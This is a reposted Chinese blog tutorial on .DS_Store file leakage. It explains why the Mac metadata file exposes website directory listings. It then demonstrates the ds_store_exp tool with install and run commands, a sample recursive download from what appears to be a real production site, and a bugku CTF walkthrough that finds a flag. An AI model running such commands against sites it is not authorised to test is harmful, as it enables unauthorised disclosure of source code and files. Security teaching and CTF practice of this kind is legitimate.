当前位置:   article > 正文

DS_Store文件泄漏_ds-store-leak

ds-store-leak

文章目录

什么DS_Store
.DS_Store是Mac OS保存文件夹的自定义属性的隐藏文件,如文件的图标位置或背景色,相当于Windows的desktop.ini。 其删除以后的副作用就是这些信息的失去。

和别人交换文件(或你做的网页需要上传的时候)应该把 .DS_Store 文件删除比较妥当,因为里面包含了一些你不一定希望别人看见的信息。尤其是网站,通过 .DS_Store 可以知道这个目录里面所有文件的清单,很多时候这是一个不希望出现的问题。

DS_Store文件泄漏
.DS_Store是Mac下Finder用来保存如何展示 文件/文件夹 的数据文件,每个文件夹下对应一个。由于开发/设计人员在发布代码时未删除文件夹中隐藏的.DS_store,可能造成文件目录结构泄漏、源代码文件等敏感信息的泄露。

利用工具——ds_store_exp
源码地址:https://github.com/lijiejie/ds_store_exp

这是一个 .DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地(生成一个该,目标网站的一个源码文件夹)。其运行需要python2环境。
从github上下载工具到本地后,先安装需要的相关库文件:

pip install -r requirements.txt
1
使用:

python ds_store_exp.py http://www.example.com/.DS_Store
 

  1. ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store
  2. hd.zj.qq.com/
  3. └── themes
  4. └── galaxyw
  5. ├── app
  6. │ └── css
  7. │ └── style.min.css
  8. ├── cityData.min.js
  9. ├── images
  10. │ └── img
  11. │ ├── bg-hd.png
  12. │ ├── bg-item-activity.png
  13. │ ├── bg-masker-pop.png
  14. │ ├── btn-bm.png
  15. │ ├── btn-login-qq.png
  16. │ ├── btn-login-wx.png
  17. │ ├── ico-add-pic.png
  18. │ ├── ico-address.png
  19. │ ├── ico-bm.png
  20. │ ├── ico-duration-time.png
  21. │ ├── ico-pop-close.png
  22. │ ├── ico-right-top-delete.png
  23. │ ├── page-login-hd.png
  24. │ ├── pic-masker.png
  25. │ └── ticket-selected.png
  26. └── member
  27. ├── assets
  28. │ ├── css
  29. │ │ ├── ace-reset.css
  30. │ │ └── antd.css
  31. │ └── lib
  32. │ ├── cityData.min.js
  33. │ └── ueditor
  34. │ ├── index.html
  35. │ ├── lang
  36. │ │ └── zh-cn
  37. │ │ ├── images
  38. │ │ │ ├── copy.png
  39. │ │ │ ├── localimage.png
  40. │ │ │ ├── music.png
  41. │ │ │ └── upload.png
  42. │ │ └── zh-cn.js
  43. │ ├── php
  44. │ │ ├── action_crawler.php
  45. │ │ ├── action_list.php
  46. │ │ ├── action_upload.php
  47. │ │ ├── config.json
  48. │ │ ├── controller.php
  49. │ │ └── Uploader.class.php
  50. │ ├── ueditor.all.js
  51. │ ├── ueditor.all.min.js
  52. │ ├── ueditor.config.js
  53. │ ├── ueditor.parse.js
  54. │ └── ueditor.parse.min.js
  55. └── static
  56. ├── css
  57. │ └── page.css
  58. ├── img
  59. │ ├── bg-table-title.png
  60. │ ├── bg-tab-say.png
  61. │ ├── ico-black-disabled.png
  62. │ ├── ico-black-enabled.png
  63. │ ├── ico-coorption-person.png
  64. │ ├── ico-miss-person.png
  65. │ ├── ico-mr-person.png
  66. │ ├── ico-white-disabled.png
  67. │ └── ico-white-enabled.png
  68. └── scripts
  69. ├── js
  70. └── lib
  71. └── jquery.min.js
  72. 21 directories, 48 files

 

实例:

bugku-sql注入2

此题本为sql账户入题目,但他同时也有DS_Store文件泄漏漏洞。

在这里插入图片描述

通过dirsearch扫描发现.DS_Store文件泄露

在这里插入图片描述 

使用利用工具——ds_store_exp查看.DS_Store文件

python ds_store_exp.py http://123.206.87.240:8007/web2/.DS_Store
在这里插入图片描述 

发现flag文件,进入已下载下来的源码文件:

在这里插入图片描述 

原文出处:DS_Store文件泄漏_WHOAMIAnony的博客-CSDN博客_.ds_store泄露

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Li_阴宅/article/detail/980614
推荐阅读
相关标签
  

闽ICP备14008679号